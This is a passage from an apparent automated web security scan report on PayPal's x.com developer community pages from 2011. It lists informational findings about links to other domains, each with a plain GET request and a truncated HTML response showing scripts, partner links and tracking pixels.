Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323033343b31342c323032353b31342c323032333b31342c323133333b31342c323032343b31342c323036333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=98163 t=1313157067253848
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<a href="http://www.odesk.com" title="oDesk.com"><img alt="Image: oDesk.com" src="https://www.paypal-portal.com/x_applications/img/logos/oDesk.png"/></a>
...[SNIP]...
<a href="http://www.blingnation.com" title="Bling Nation"><img alt="Image: Bling Nation" src="https://www.paypal-portal.com/x_applications/img/logos/Bling_Nation.jpg"/></a>
...[SNIP]...
<a href="http://www.indiegogo.com/" title="IndieGoGo"><img alt="Image: IndieGoGo" src="https://www.paypal-portal.com/x_applications/img/logos/IndieGoGo.png"/></a>
...[SNIP]...
<a href="http://www.iconcessionstand.com" title="iConcessionStand"><img alt="Image: iConcessionStand" src="https://www.paypal-portal.com/x_applications/img/logos/iconcessionstand.jpg"/></a>
...[SNIP]...
<a href="http://www.wooga.com/" title="Wooga"><img alt="Image: Wooga" src="https://www.paypal-portal.com/x_applications/img/logos/Wooga_VZ_Payment.png"/></a>
...[SNIP]...
<span style="font-size:10px; float:right; padding: 3px 5px 0 0;"><a href="https://www.paypal-portal.com/developer/x_applications/" title="Submit Here">.. Submit Here</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.9. https://www.x.com/community/ppx/xspaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces?view=documents HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:50 GMT; Path=/
Vary: User-Agent
JP: D=171785 t=1313156390079353
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.10. https://www.x.com/community/ppx/xspaces/accelerator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/accelerator?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323232313b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=108978 t=1313157053716957
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.11. https://www.x.com/community/ppx/xspaces/certification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/certification?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=68710 t=1313157037638545
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<span style="font-size: 12pt; ">Find a developer in the <a class="jive-link-external-small" href="https://www.paypal-portal.com/developer/directory/">Certified Developer Directory</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.12. https://www.x.com/community/ppx/xspaces/cloud-computing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/cloud-computing?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=120989 t=1313157039087320
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.13. https://www.x.com/community/ppx/xspaces/digital_goods  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/digital_goods?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=107217 t=1313157040199581
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.14. https://www.x.com/community/ppx/xspaces/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/finance?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=134360 t=1313157041133758
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.15. https://www.x.com/community/ppx/xspaces/forums  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/forums?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323130303b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=183585 t=1313157053120279
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.16. https://www.x.com/community/ppx/xspaces/gaming  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/gaming?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=118887 t=1313157047288824
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.17. https://www.x.com/community/ppx/xspaces/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/identity?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034383b31342c323034393b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:42 GMT; Path=/
Vary: User-Agent
JP: D=183626 t=1313157041875780
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.18. https://www.x.com/community/ppx/xspaces/innovate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/innovate?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035303b31342c323035323b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=115983 t=1313157049401199
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.19. https://www.x.com/community/ppx/xspaces/introduce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.20. https://www.x.com/community/ppx/xspaces/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/xspaces/mobile?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=220885 t=1313157037094133
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
